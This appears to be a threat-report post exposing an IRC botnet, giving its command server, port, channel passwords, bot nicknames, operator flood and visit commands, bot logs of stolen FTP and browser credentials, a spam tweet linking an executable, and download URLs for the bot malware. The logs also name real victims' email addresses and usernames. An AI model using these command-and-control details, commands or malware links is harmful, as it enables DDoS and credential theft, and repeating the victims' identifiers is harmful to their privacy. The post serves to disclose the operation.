KCA botnet found by xDrulz (all logs come from him)
kca.hopto.org resolved to 88.255.116.48
Server: kca.hopto.org
Port:1453
Channel: #KCA
Password: KCA
Botnick: {US|XP-32a}dwqeivt
Channel: #XXX
Password: KCA
Botnick: [iRooT-XP-USA]959715
Other channels #s #XX #Okey
* Retrieving #Okey modes…
[14:21:06] * irc.ciftokey.com sets mode: +o Cihan
[14:22:31] <Cihan> .udp 91.229.35.79 5050 5
[14:49:34] <Cihan> .visit http://www.avdeposu.com.tr
Stealing ftp passwords
[19:32] <IRC> {US|XP-32a}dwqeivt: FileZilla -> 7 ser5.scottdalehosting5.com – 7 ptcmania : nope
[19:32] <IRC> {GE|XP-32a}elygxwn: FileZilla -> 7 kukaracha.ucoz.com – 7 dkukaracha :nope
[19:32] <IRC> {BR|XP-32a}kdqzbti: UDP flood on 7 200.50.224.64 for 7 60 seconds has finished.
[19:32] <IRC> {AR|W7-64u}jwhgdux: FileZilla -> 7 188.165.207.196 – 7 cristian : nope
[19:32] <IRC> {LT|XP-32a}vqkthfh: FileZilla -> 7 nkk.lt – 7 Controllers :nope
[19:32] <IRC> {GE|XP-32a}cksuemn: FileZilla -> 7 80.241.245.245 – 7 5555 : nope
[19:32] <IRC> {TR|XP-32a}ebogthv: FileZilla -> 7 mysql5.000webhost.com – 7 a3242683 : nope
[19:32] <IRC> {TR|XP-32a}ebogthv: FileZilla -> 7 mysql5.000webhost.com – 7 a3242683_forum :nope
[19:32] <IRC> {GE|XP-32a}cksuemn: FileZilla -> 7 80.241.255.255 – 7 5555 : nope
03[19:32] * Joins: {BA|W7-32u}nsnqdju (nsnqdju@59-127-242-80-gr.cable.dyn.broadband.blic.net)
[19:32] <IRC> {TR|XP-32a}ebogthv: FileZilla -> 7 a3242683_forum – 7 mysql5.000webhost.com : nope
[19:32] <IRC> {GE|XP-32a}cksuemn: FileZilla -> 7 80.241.255.255 – 7 5555 : nope
[19:32] <IRC> {TR|XP-32a}ebogthv: FileZilla -> 7 tekforum.comoj.com – 7 a3242683 :nope
[19:32] <IRC> {GE|XP-32a}cksuemn: FileZilla -> 7 luxserv.do.am – 7 8luxserv : nope
[19:32] <IRC> {BG|W7-32a}mblbsar: FileZilla -> 7 www.djshop.free.bg – 7 www.djshop.free.bg :nope
[19:32] <IRC> {BG|W7-32a}mblbsar: FileZilla -> 7 www.free.bg – 7 www.djshop.free.bg : nope
[19:32] <IRC> {BG|W7-32a}mblbsar: FileZilla -> 7 www.djshop.free.bg – 7 djshop : nope
Stealing browser passwords
[21:41] <IRC> {CZ|XP-32u}aslmqzz: Chrome -> 7 http://www.facebook.com/ -> 7 kacka.slajsova@seznam.cz : nope
[21:41] <IRC> {SK|W7-64u}aineytn: Chrome -> 7 http://oaprievidza.edupage.org/login/ -> 7 DenisaBlahová : nope
[21:41] <IRC> n{TH|XP-32a}pxsypum: Chrome -> 7 https://www.facebook.com/login.php -> 7 anniiza@hotmail.com : nope
[21:41] <IRC> {CZ|W7-64u}yizcpcd: Chrome -> 7 http://www.seznam.cz/ -> 7 michal.scoot : nope
[21:41] <IRC> {HU|W7-64u}ofcidiq: Chrome -> 7 http://www.mobiltelo.hu/belepes -> 7 mohalevi97@freemail.hu : nope
[21:41] <IRC> {BR|XP-32a}eucekhl: Chrome -> 7 https://twitter.com/download/ -> 7 matheus_porci14@yahoo.com.br : nope
[21:41] <IRC> {PL|W7-64u}rmjtugr: Chrome -> 7 https://fr.twitter.com/login/error -> 7 wisiaa1 : nope
[21:41] <IRC> {TH|W7-64a}jqrogpr: Chrome -> 7 https://apps.facebook.com/index.php -> 7 rosesfall_1981@hotmail.com : nope
[21:41] <IRC> n{TH|W7-32a}cabwbtk: Chrome -> 7 https://apps.facebook.com/index.php -> 7 nutstory-lf@hotmail.com : nope
[21:41] <IRC> {TH|W7-64a}qhcgslg: Chrome -> 7 http://apps.facebook.com/index.php -> 7 inventory-z@windowslive.com : nope
[21:41] <IRC> {VN|XP-32a}eycvlzu: Chrome -> 7 https://www.facebook.com/ -> 7 vietdd88@gmail.com :nope
[21:41] <IRC> n{BR|W7-32u}xysecqc: Chrome -> 7 http://208.115.228.199/index2.php -> 7 -Mooranguinha. : nope
Twitter spreading
[21:44] <IRC> {PL|W7-64u}sevlbfy: Twitter status updated: 7 dagmara123girl@gmail.com -> 7 😀 http://148.208.248.227/r.exe :D! .
Opers
03[19:16] * CaCa sets mode: +o DeLi
03[19:16] * CaCa sets mode: +o D|_PaLo
03[19:16] * CaCa sets mode: +o hx
03[19:16] * CaCa sets mode: +o Jorgee
03[19:16] * CaCa sets mode: +o st0n3d
ngrbot file: hxxp://www.pso-k.org/yes.exe
iRooT bot file: hxxp://www.pso-k.org/fb.exe
Hosting infos: http://whois.domaintools.com/88.255.116.48